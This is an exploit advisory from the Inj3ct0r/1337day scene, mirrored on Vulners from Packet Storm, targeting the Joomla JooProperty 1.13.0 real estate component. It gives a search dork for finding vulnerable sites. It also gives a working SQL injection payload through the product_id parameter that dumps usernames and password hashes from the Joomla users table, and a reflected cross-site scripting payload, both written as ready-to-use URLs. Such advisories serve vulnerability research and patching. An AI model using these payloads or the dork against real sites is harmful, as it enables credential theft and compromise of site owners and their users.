Lucene search
K

Joomla Jooproperty SQL Injection / Cross Site Scripting

🗓️ 11 Dec 2012 00:00:00Reported by Daniel BarraganType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

Joomla Jooproperty SQL Injection / XSS, Version 1.13.0, Allows SQL injection through product_id parameter and cross-site scripting through product_id and layout parameters

Code
` 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm D4NB4R member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
#Exploit Title: Joomla com_jooproperty SQL injection && Cross site scripting Vulnerability  
  
Dork: inurl:com_jooproperty  
  
Date: [10-12-2012]  
  
Author: Daniel Barragan "D4NB4R"  
  
Twitter: @D4NB4R  
  
Vendor: http://www.jooproperty.com/  
  
Demo: http://www.jooproperty.com/es/jooproperty-componente-inmuebles-joomla-migracion-com-property-demo.html  
  
Version: 1.13.0  
  
Date Added: 12 November 2012  
  
License: GPLv2 or later Commercial]  
  
Compatibility: Joomla! 2.5 Series  
  
Information: http://extensions.joomla.org/extensions/vertical-markets/real-estate/22500  
  
Tested on: [Linux(Arch)-Windows(7ultimate)]  
  
  
Descripcion:   
  
JooProperty is a real estate component developed for Joomla 1.7 and 2.5 with complex integrated booking features,   
price calculation for different seasons and comment and rating functions.  
The component is based on com-property for Joomla 1.5 of Fabio Ueltzinger and offers the possibility to import   
the database of com-property V3 and V4 to migrate your realty website to Joomla 2.5.  
All property relevant information like categories, locations, description, extras/amenities, season, price   
categories, prices and special fees can be translated.  
  
  
Vulnerable Parameter Name:   
  
product_id  
  
Parameter Type:   
  
Querystring   
  
Method:   
Get  
  
  
Attack Pattern Sql:  
  
-{Valid id}%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R   
  
Attack Pattern Xss:  
  
?layout=modal&option=com_jooproperty&product_id=" onmouseover%3dprompt() bad%3d"&view=booking  
  
  
Exploit Demo:   
  
SQLi : SQL injection  
  
http://localhost/?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R   
  
xss : Cross site scripting  
  
http://localhost/?layout=modal&option=com_jooproperty&product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&view=booking  
  
Greetz: All Member Inj3ct0r Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha  
* shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic  
* Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel  
* L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects  
* aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe  
* ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te  
  
  
_____________________________________________________  
Daniel Barragan "D4NB4R" 2012  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
37